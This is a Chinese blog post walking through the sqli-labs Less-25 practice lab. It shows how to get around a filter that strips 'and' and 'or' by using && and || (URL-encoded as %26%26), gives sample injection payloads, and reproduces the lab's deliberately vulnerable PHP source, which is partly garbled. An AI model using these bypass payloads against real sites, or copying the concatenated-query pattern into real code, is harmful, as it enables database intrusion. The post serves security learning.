美文网首页
sql-labs less25 or and 过滤

sql-labs less25 or and 过滤

作者: Yix1a | 来源:发表于2019-05-15 17:29 被阅读0次
  • 转自一个不知名大佬的笔记

----------------------------------less-25------------------------------------

原url:

http://192.168.137.138/sqli-labs-master/Less-25/

照提示输入id值

        or   与     and  的等效字符

1.等效替换

    and  =====> &&


    or   =====> ||

2.后台验证

验证 && 字符是否有效:

mysql> select * from users where id > 5 and id < 10;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 123 |
| 9 | admin1 | admin1 |
+----+----------+----------+
4 rows in set (0.02 sec)

mysql> select * from users where id > 5 && id < 10;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 123 |
| 9 | admin1 | admin1 |
+----+----------+----------+
4 rows in set (0.00 sec)

验证 || 字符是否有效:

mysql> select * from users where id=5 or id=10;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 5 | stupid | stupidity |
| 10 | admin2 | admin2 |
+----+----------+-----------+
2 rows in set (0.00 sec)

mysql> select * from users where id=5 || id=10;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 5 | stupid | stupidity |
| 10 | admin2 | admin2 |
+----+----------+-----------+
2 rows in set (0.00 sec)

可见,|| 和 && 同样起作用

            前端注入测试

1.后台sql语句分析

2.利用 or 和and验证

3.绕过对 or 和 and 的过滤

进入less-25的页面,在下方有提示:

Your Input is Filtered with following result: 1'(你的输入被过滤后的结果)

单引号报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

错误分析:

near ' ' 1' ' LIMIT 0,1 ' at line 1

猜测后台 sql 语句:

select username,password from table where id = 'input'

简单的验证注入语句:

1' and 1=1 #

效果如下:

返回页面并不是正常页面,而且爆出了语法错误

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 ' LIMIT 0,1' at line 1

页面末尾的提示:

Hint: Your Input is Filtered with following result: 1' 1=1

id后面的 原本是

1' and 1=1 #

过滤后:

1' 1=1

说明过滤掉了 and 和 #

现在把 and 大小写,然后 --+ 替换#试试

语句:

1' AnD 1=1 --+

效果如下:

返回页面还是报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=1 -- ' LIMIT 0,1' at line 1

末尾提示:

Hint: Your Input is Filtered with following result: 1' 1=1 --

这次是 and 被过滤了,双横杠被保留了下来

这说明 ,and 被过滤是不分大小写的,双横杠 注释符没被过滤

那现在来试一试 && 代替 and 呢?

语句如下:

1' && 1=1 --+

效果如下:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

返回页面还是报错了

这是为什么呢

因为,&这个符号,在sql中是and 的意思,但是在url中有特殊意义


在这里,查询了一下资料,科普一下"#","?","&"字符在url中的意义:

  #       代表网页中的一个位置。其右面的字符,就是该位置的标识符。比如,

http://www.example.com/index.html#print就代表网页index.html的print位置。浏览器

读取这个URL后,会自动将print位置滚动至可视区域。

1)连接作用:比如

http://www.xxx.com/Show.asp?id=77&nameid=2905210001&page=1

2)清除缓存:比如

http://www.xxxxx.com/index.html

http://www.xxxxx.com/index.html?test123123

两个url打开的页面一样,但是后面这个有问号,说明不调用缓存的内容,而认为是一个新
地址,重新读取。

  &

不同参数的间隔符


所以,要对 && 字符,进行 url 编码(firefox里的hackbar自带)

编码后的注入语句:

1' %26%26 1=1 --+

效果如下:

页面返回正常

末尾提示:

Hint: Your Input is Filtered with following result: 1' && 1=1 --

在这个 1=1 的位置呢,可以构造更复杂的 注入语句,这里就不一一试验了

or 的情况 和 and 的情况 相同

---------------------------------源码部分------------------------------------

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables
if(isset(_GET['id'])) {id=_GET['id']; //logging the connection parameters to a file for analysis.fp=fopen('result.txt','a');
fwrite(fp,'ID:'.id."\n");
fclose($fp);

//fiddling with comments
$id= blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint=$id;

// connectivity
sql="SELECT * FROM users WHERE id='id' LIMIT 0,1";
result=mysql_query(sql);
row = mysql_fetch_array(result);
if(row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'.row['username'];
echo "
";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}

function blacklist(id)//过滤函数,将and和or 进行过滤 {id= preg_replace('/or/i',"", id);//i的意思就是忽略大小写 //strip out OR (non case sensitive)id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)

return $id;

}

?>

相关文章

网友评论

      本文标题:sql-labs less25 or and 过滤

      本文链接:https://www.haomeiwen.com/subject/sokmaqtx.html